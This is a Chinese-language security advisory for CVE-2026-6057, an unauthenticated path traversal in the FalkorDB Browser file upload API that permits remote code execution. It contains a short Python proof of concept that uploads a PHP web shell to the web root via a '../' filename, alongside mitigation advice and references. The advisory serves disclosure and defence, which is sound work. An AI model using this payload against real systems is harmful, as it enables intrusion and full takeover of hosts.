CVE-2026-6057 CVSS 9.8 严重

CVE-2026-6057 FalkorDB Browser路径遍历致RCE

披露日期: 2026-04-10

来源: 33c584b5-0579-4c06-b2a0-8d8329fcab9c

漏洞信息

漏洞编号

CVE-2026-6057

漏洞类型

路径遍历

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

FalkorDB Browser

漏洞概述

FalkorDB Browser 1.9.3版本中存在一个未授权的路径遍历漏洞，该漏洞位于文件上传API接口。由于缺乏必要的安全检查，远程攻击者无需身份认证即可利用此漏洞在服务器上写入任意文件，最终可能导致远程代码执行（RCE），完全控制受影响的主机。

技术细节

该漏洞的成因是FalkorDB Browser在处理文件上传请求时，未能正确过滤文件名参数中的路径遍历字符（如"../"）。攻击者可以通过发送特制的HTTP POST请求到受影响的API端点，并在文件名字段中插入遍历序列。这使得攻击者能够绕过应用程序的根目录限制，将恶意文件（例如Webshell或恶意脚本）写入服务器的任意可写目录。一旦文件被成功上传到Web可执行目录，攻击者即可通过浏览器访问该文件，从而在服务器端执行任意系统命令。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出互联网上暴露的FalkorDB Browser服务（版本1.9.3或更早）。

STEP 2

2. 漏洞利用

攻击者向文件上传API发送特制的POST请求，在文件名中利用"../"序列进行路径遍历。

STEP 3

3. 写入文件

服务器未能校验路径，将恶意文件（如Webshell）写入Web根目录或系统关键目录。

STEP 4

4. 执行代码

攻击者通过浏览器访问已上传的恶意文件，触发服务器端代码执行，获取系统权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Replace with actual target)
target_url = "http://vulnerable-host/api/upload"

# Malicious file with path traversal payload
# Example: Uploading a PHP shell to the web root
files = {
    'file': ('../../var/www/html/shell.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php')
}

# Exploit attempt
response = requests.post(target_url, files=files)

if response.status_code == 200:
    print("[+] Exploit successful! File uploaded.")
    print("[+] Check your shell at: http://vulnerable-host/shell.php?cmd=whoami")
else:
    print("[-] Exploit failed.")

影响范围

FalkorDB Browser 1.9.3

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用文件上传API功能，或者通过网络访问控制列表（ACL）限制仅受信任的内网IP地址可以访问该接口，直至漏洞修复完成。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6057
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6057
3 Details https://www.cvedetails.com/cve/CVE-2026-6057/
4 VulDB https://vuldb.com/cve/CVE-2026-6057
5 Link https://github.com/FalkorDB/falkordb-browser
6 Link https://github.com/FalkorDB/falkordb-browser/pull/1611

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表